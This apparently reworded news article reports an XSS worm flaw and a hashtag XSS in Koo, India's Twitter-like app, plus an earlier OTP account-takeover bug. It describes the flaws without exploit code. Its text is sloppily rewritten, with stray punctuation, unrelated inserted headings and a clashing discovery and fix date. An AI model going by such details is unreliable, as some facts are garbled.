Home Web timeline India’s Koo, a Twitter-like service, found vulnerable to critical worm attacks

India’s Koo, a Twitter-like service, found vulnerable to critical worm attacks


Koo, the Twitter clone in India, recently fixed a serious security flaw that could have been exploited to execute arbitrary JavaScript code against hundreds of thousands of its users, spreading the attack on the platform.

The vulnerability involves a stored cross-site scripting flaw (also known as persistent XSS) in Koo’s web application that allows malicious scripts to be embedded directly into the affected web application.

To complete the attack, all a malicious actor had to do was log into the service through the web application and post an XSS encoded payload on its timeline, which is automatically executed on behalf of all. users who viewed the post.

Stack overflow teams

The issue was discovered by security researcher Rahul Kankrale in July, after which a fix was rolled out by Koo on July 3.

Using cross-site scripts, an attacker can perform actions on behalf of users with the same privileges as the user and steal web browser secrets, such as authentication cookies.

Due to the fact that malicious JavaScript has access to all objects that the website can access, it could allow adversaries to sneak into sensitive data such as private messages, or to distribute false information or display information. spam using user profiles.

The end result of this vulnerability in Koo, also known as the XSS worm, is more worrying as it automatically spreads malicious code among website visitors to infect other users, without any user interaction. , like a chain reaction.

Koo, which was launched in November 2019, promotes itself as an Indian alternative to Twitter and has 6 million active users on its platform. The Bengaluru-based company has also emerged as Nigeria’s social media service of choice after the country indefinitely banned Twitter for deleting a tweet from Nigerian President Muhammadu Buhari.

Corporate password management

Aprameya Radhakrishna, co-founder and CEO of Koo, announced the app’s entry into the Nigerian market earlier this week.

An XSS vulnerability associated with the hashtag functionality was also addressed, allowing an adversary to pass malicious JavaScript code into the endpoint used to search for a specific hashtag (“https: // www[.]kooapp[.]com / tag /[hashtag]”).

The fixes follow another critical vulnerability in the Koo application that was patched earlier in February, which could have allowed attackers to access any user account on the platform without requiring password or user interaction.

Hacking of Koo app accounts

It was discovered by Prasoon Gupta, an independent security researcher. In an interview with The Hacker News, Prasoon explained that the vulnerability is due to the way the application validates access tokens when a user is authenticated with a one-time phone number and password (OTP ) sent to him.

The disclosure comes just over a month after similar XSS-related vulnerabilities were discovered in Microsoft’s Edge browser, which can be exploited to trigger an attack simply by adding a comment to a YouTube video or sending a request. Facebook friend from an account that contains non-English content along with an XSS payload.


Please enter your comment!
Please enter your name here